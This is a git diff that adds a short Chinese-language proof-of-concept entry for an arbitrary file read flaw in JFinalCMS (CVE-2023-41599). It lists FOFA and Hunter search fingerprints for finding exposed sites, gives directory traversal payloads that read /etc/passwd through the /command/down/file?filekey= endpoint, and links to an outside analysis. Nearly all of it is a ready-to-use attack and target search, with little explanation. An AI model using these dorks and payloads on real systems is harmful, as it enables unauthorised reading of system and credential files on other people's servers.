diff --git a/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md
new file mode 100644
index 0000000..cea75be
--- /dev/null
+++ b/JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md	
@@ -0,0 +1,23 @@
+## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
+
+
+## 特征
+```fofa:
+
+body="content=\"JreCms"
+
+hunter:
+
+web.body="content=\"JreCms"
+```
+## POC
+```
+Windows: /../../../../../../../../../test.txt
+Linux:	/../../../../../../../../../etc/passwd
+
+/command/down/file?filekey=/../../../../../../../../../etc/passwd
+```
+
+
+## 漏洞分析
+http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/